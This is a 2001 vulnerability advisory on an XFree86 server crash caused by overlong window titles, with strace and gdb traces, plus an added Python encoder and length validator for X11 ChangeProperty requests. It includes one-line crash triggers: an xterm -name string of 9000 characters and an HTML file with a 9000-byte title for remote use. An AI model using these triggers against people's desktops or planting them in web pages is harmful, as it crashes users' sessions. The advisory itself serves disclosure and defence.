XFree86 DOS / Buffer overflow local and remote.

2001-09-24T00:00:00
ID SECURITYVULNS:DOC:2049
Type securityvulns
Reporter Securityvulns
Modified 2001-09-24T00:00:00

Description

While playing with the WindowMaker title overflow I noticed the following...I have tested this while running KDE and while running plain vanilla xwindows with no window manager. The first time I was in WindowMaker and of course it segfaulted also. This seems to work on Mandrake 8.0 ppc but not on my Mandrake 7.2 i586.

I was trying to exploit the WindowMaker overflow using xterm -name <long string here>. Instead I ended up crashing X altogether.

This is the end of a strace of the WindowMaker wmaker executable with the PID of 2003:

upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAA: fatal IO error 32 (Broken pipe) or KillClient on X server "localhost:0.0"
[1]+  Done                    strace -o wmaker.strace -ivfp 2003

Here's the end of the message dumped to my screen when I typed startx from my bash prompt.

(**) Mouse1: Core Pointer
(==) Mouse1: Buttons: 3
(**) Mouse1: Emulate3Buttons, Emulate3Timeout: 50
(II) Keyboard "Keyboard1" handled by legacy driver
(II) XINPUT: Adding extended input device "Mouse1" (type: MOUSE)

Fatal server error: Caught signal 11. Server aborting

When reporting a problem related to a server crash, please send the full server output, not just the last messages. This can be found in the log file "/var/log/XFree86.0.log". Please report problems to xfree86@xfree86.org.

xinit: connection to X server lost.

The first few lines of the core file lead me to believe I was crashing X rather than wmaker.

strings core
CORE
CORE
/etc/X11/X
:0
-auth
/root/.Xauthority
-deferglyphs
16

I ran gdb on the xterm program to make sure I wasn't overflowing the xterm -name parameter.

(gdb) run -display localhost:0 -name `perl -e 'print "A" x 9000'`
Starting program: /usr/X11R6/bin/xterm -display localhost:0 -name `perl -e 'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
Program exited normally.

As you can see it exited normally. From the strace below we can see that /etc/X11/X segfaults for some reason.

2760 [0fe987d8] read(14, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 6316) = 6316
2760 [0fe987d8] read(14, "8A\0\4\0\340\0\273\0\10\0\0\0\0\0\0008A\0\4\0\340\0\340"..., 9088) = 2064
2760 [0fe71514] gettimeofday({1001226845, 554528}, NULL) = 0
2760 [0fe71514] gettimeofday({1001226845, 556127}, NULL) = 0
2760 [10162b24] --- SIGSEGV (Segmentation fault) ---
2760 [0fe091b0] rt_sigaction(SIGSEGV, {SIG_IGN}, {0x1003d664, [SEGV], SA_RESTART}, 8) = 0
2760 [0fe091b0] --- SIGALRM (Alarm clock) ---
2760 [0fe987e8] write(2, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(0, "\nFatal server error:\n", 21) = 21
2760 [0fe987e8] write(2, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(0, "Caught signal 11. Server aborti"..., 35) = 35
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe987e8] write(2, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(0, "\nWhen reporting a problem relate"..., 117) = 117
2760 [0fe987e8] write(2, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(0, "This can be found in the log fil"..., 60) = 60
2760 [0fe987e8] write(2, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(0, "Please report problems to xfree8"..., 47) = 47
2760 [0fe987e8] write(2, "\n", 1) = 1
2760 [0fe987e8] write(0, "\n", 1) = 1
2760 [0fe9a008] unlink("/tmp/.X0-lock") = 0

The following seemed to do the trick when viewed with netscape... I had to click the x in the corner of the window to exit netscape before it crashed... either that or it just took a sec.

echo "<HEAD><TITLE>"`perl -e 'print "A" x 9000'`"</TITLE></HEAD>" > file.html

Since you can put this HTML on any web page, I suppose that makes this issue remote also.

-KF
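Added example (editor's code, not part of KF's post or of XFree86): both repro paths in the post, the xterm -name string and the 9000-byte HTML title, reach the server the same way under ICCCM, as a core-protocol ChangeProperty request that sets the window's WM_NAME (or WM_CLASS) property. The Python below builds that request byte for byte as a client library would, and parses it back with the length-consistency check a server has to make before it copies the value anywhere. The window id, the byte order and the tampered copy are constructed for the demo; the post does not identify which server code path faulted, and nothing here reproduces the crash itself.

```python
"""X11 core-protocol ChangeProperty: client-side encoder and the
server-side length validation it needs. Added illustration only; the
atom ids are the protocol's predefined ones, everything else is
constructed for the demo."""
import struct

CHANGE_PROPERTY = 18      # core protocol major opcode
PROP_MODE_REPLACE = 0
WINDOW = 0x02000001       # hypothetical client window resource id
ATOM_WM_NAME = 39         # predefined atom WM_NAME
ATOM_STRING = 31          # predefined atom STRING


def _pad4(n):
    """Bytes needed to round n up to a multiple of 4."""
    return (4 - n % 4) % 4


def build_change_property(window, prop, ptype, data, fmt=8,
                          mode=PROP_MODE_REPLACE, endian="<"):
    """Encode a ChangeProperty request as a client library would.

    Wire layout: 1 opcode, 1 mode, 2 request length (4-byte units),
    4 window, 4 property, 4 type, 1 format, 3 unused,
    4 data length (in format units), data, pad to 4.
    The byte order is negotiated per connection; "<" is assumed here.
    """
    if fmt not in (8, 16, 32):
        raise ValueError("format must be 8, 16 or 32")
    unit = fmt // 8
    if len(data) % unit:
        raise ValueError("data is not a whole number of format units")
    nunits = len(data) // unit
    body_len = 24 + len(data) + _pad4(len(data))
    req_len = body_len // 4
    if req_len > 0xFFFF:
        # Only 16 bits of 4-byte units without the BIG-REQUESTS extension.
        raise ValueError("request too large for a core-protocol length field")
    header = struct.pack(endian + "BBH", CHANGE_PROPERTY, mode, req_len)
    fixed = struct.pack(endian + "IIIB3xI", window, prop, ptype, fmt, nunits)
    return header + fixed + data + b"\0" * _pad4(len(data))


class MalformedRequest(ValueError):
    pass


def parse_change_property(buf, endian="<"):
    """Decode a ChangeProperty request, checking lengths the way a server must.

    Returns (window, property, type, format, data). Raises MalformedRequest
    when the declared request length, the declared data length and the
    bytes actually present disagree. In C the nunits * unit product and the
    24 + nbytes + pad sum must be computed in a width that cannot wrap,
    since the data-length field is a full 32 bits.
    """
    if len(buf) < 24:
        raise MalformedRequest("short header")
    opcode, mode, req_len = struct.unpack(endian + "BBH", buf[:4])
    if opcode != CHANGE_PROPERTY:
        raise MalformedRequest("not a ChangeProperty request")
    window, prop, ptype, fmt, nunits = struct.unpack(endian + "IIIB3xI", buf[4:24])
    if fmt not in (8, 16, 32):
        raise MalformedRequest("bad format")
    nbytes = nunits * (fmt // 8)
    expected = 24 + nbytes + _pad4(nbytes)
    if req_len * 4 != expected:
        raise MalformedRequest(
            f"declared request length {req_len * 4} != {expected} implied by data length")
    if len(buf) < expected:
        raise MalformedRequest("request truncated")
    return window, prop, ptype, fmt, buf[24:24 + nbytes]


def title_request(title):
    """The request an ICCCM client sends to set its window title."""
    return build_change_property(WINDOW, ATOM_WM_NAME, ATOM_STRING,
                                 title.encode("latin-1"))


def demo():
    """Constructed input mirroring the post: a 9000-byte title of 'A's."""
    req = title_request("A" * 9000)
    _, _, _, _, data = parse_change_property(req)
    # Tampered copy: the data-length field (offset 20) claims far more
    # than the request carries, which a correct server must reject.
    bad = bytearray(req)
    struct.pack_into("<I", bad, 20, 100000)
    try:
        parse_change_property(bytes(bad))
        tampered_rejected = False
    except MalformedRequest:
        tampered_rejected = True
    return len(req), len(data), tampered_rejected


if __name__ == "__main__":
    print(demo())  # (9024, 9000, True)
```

A 9000-byte title is small by protocol standards (the core request length field allows up to 262140 bytes), so a well-formed request of that size is not itself out of spec; the server-side question is whether every consumer of the value, from the property store to the window manager's title rendering, honours the length the protocol delivered rather than assuming a fixed buffer.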